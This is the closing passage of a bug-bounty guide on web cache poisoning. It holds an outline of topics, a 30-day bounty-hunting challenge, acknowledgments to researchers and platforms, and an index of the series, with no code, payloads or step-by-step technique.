• Response splitting in modern contexts
• Comprehensive testing methodology

Part 2: Exotic Header Exploitation

• 50+ headers beyond X-Forwarded-Host
• Framework-specific techniques
• Real HackerOne reports with links
• Header chaining strategies

Part 3: Advanced Weaponization

• XSS escalation ladder ($500 → $25K)
• DoS techniques earning $9,700+
• Multi-stage attack chains
• Business impact demonstration
• Real case studies with bounties
• Complete hunting methodology

Closing Challenge

30-Day Challenge: Using only the techniques in this guide:

1. Find 3 cache poisoning vulnerabilities
2. Escalate at least 1 to critical impact
3. Earn your first $2,000+ bounty
4. Share your (redacted) success story

Acknowledgments

This research builds on the shoulders of giants:

• James Kettle (@albinowax) — For pioneering practical cache poisoning research
• PortSwigger Research Team — For continuing to push boundaries
• HackerOne Community — For disclosed reports that educated us all
• Every researcher cited — For sharing knowledge openly

Support the Research

If this guide helped you earn bounties, consider:

• Sharing it with the community (redacted for responsible disclosure)
• Contributing your own findings
• Mentoring newcomers
• Citing this work in your research

End of The Cache Poisoning Bible — Part 3

Full Series:

• Part 1: Advanced Fundamentals
• Part 2: Exotic Header Exploitation
• Part 3: Advanced Weaponization ← You are here

Stay tuned for: The Cache Poisoning Bible — Part 4: Automation & Scale (Coming Soon)

May your caches be vulnerable and your bounties be high. 🚀

Last Updated: November 2025